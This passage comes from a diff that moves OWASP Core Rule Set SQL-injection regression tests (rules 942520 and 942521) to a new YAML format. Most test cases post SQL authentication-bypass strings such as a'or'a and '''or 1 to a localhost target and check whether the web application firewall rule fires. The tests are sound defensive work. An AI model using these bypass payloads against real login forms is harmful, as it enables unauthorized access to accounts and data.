text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'+email-- (there seem to be a bug with double encoding in tests) + data: "var=x'%252Bemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 9 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'^email-- - data: "var=x'%5Eemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'^email-- + data: "var=x'%5Eemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 10 desc: "Nagive test: Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'@email-- - data: "var=x'%40email--" - version: HTTP/1.0 - output: - no_log_contains: id "942520" - - test_title: 942520-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'@email-- + data: "var=x'%40email--" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942520] + - test_id: 11 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'&email-- - data: "var=x'%26email--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'&email-- + data: "var=x'%26email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 12 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'email-- - data: "var=x'%3Eemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'>email-- + data: "var=x'%3Eemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 14 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'=email-- - data: "var=x'%3Demail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'=email-- + data: "var=x'%3Demail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 15 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'/email-- - data: "var=x'%2Femail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'/email-- + data: "var=x'%2Femail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 16 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'%email-- - data: "var=x'%25email--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'%email-- + data: "var=x'%25email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 17 desc: "Negative test: Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'~email-- - data: "var=x'~email--" - version: HTTP/1.0 - output: - no_log_contains: id "942520" - - test_title: 942520-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'~email-- + data: "var=x'~email--" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942520] + - test_id: 18 desc: "Detects basic SQL auth bypass with mod" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=x'%20mod%20id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=x'%20mod%20id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 19 desc: "Detects basic SQL auth bypass with: sounds like" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='sounds%20like%20rowid--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='sounds%20like%20rowid--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 20 desc: "Bypass with a comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='%2F**%2F*2--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='%2F**%2F*2--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 21 desc: "Integration test: 942521 blocks foo'or'oof" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo'or'oof" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942520-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo'or'oof" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 22 desc: "Integration test: 942522 blocks foo\\''or'oof" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo%5c''or'oof" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942520-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo%5c''or'oof" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 23 desc: "Detect auth bypass email=' is not?--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=%27%20is%20not%3F--" - version: HTTP/1.0 - output: - log_contains: id "942520" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=%27%20is%20not%3F--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml index 4a11928..29eec39 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml @@ -2,410 +2,409 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.1/4" - enabled: true - name: 942521.yaml +rule_id: 942521 tests: - - test_title: 942521-1 + - test_id: 1 desc: "Detects the most basic authentication bypass with 'or'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=a'or'a" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=a'or'a" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 2 desc: "Detects basic SQLite authentication bypass with 'or?'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=a'or?--" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=a'or?--" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 3 desc: "False-positive: Detects or-based authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=is%20this%20your%20parents'%20or%20yours?" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=is%20this%20your%20parents'%20or%20yours?" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 4 desc: "Detects basic SQL auth bypass and-based" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'and%20id%20is%20not?--" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'and%20id%20is%20not?--" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 5 desc: "False-positve: is it your parents' or yours" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=it%20is%20your%20parents'%20and%20yours" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=it%20is%20your%20parents'%20and%20yours" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 6 desc: "Negative test: bob's or alice's" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=bob's%20or%20alice's" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=bob's%20or%20alice's" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 7 desc: "Negative test: mother or daugher" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=mother%20or%20daughter" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=mother%20or%20daughter" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 8 desc: "Negative test: 'oreo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='oreo" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='oreo" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 9 desc: "Negative test: 'fork" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='fork" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='fork" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 10 desc: "Negative test: 'for" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='%20for" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='%20for" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 11 desc: "Negative test: ''or" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=''or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=''or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 12 desc: "Negative test: 'books' or 'applles'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=''or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=''or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 13 desc: "Negative test: bob's presentation's 'or'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=''or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=''or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 14 desc: "Bypass with '''or 1" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='''or%201" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='''or%201" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 15 desc: "False-negative: Not detected with escapes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C'lol'%20or%20'1" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%5C'lol'%20or%20'1" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 16 desc: "Negative test: Wikipedia article about SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%20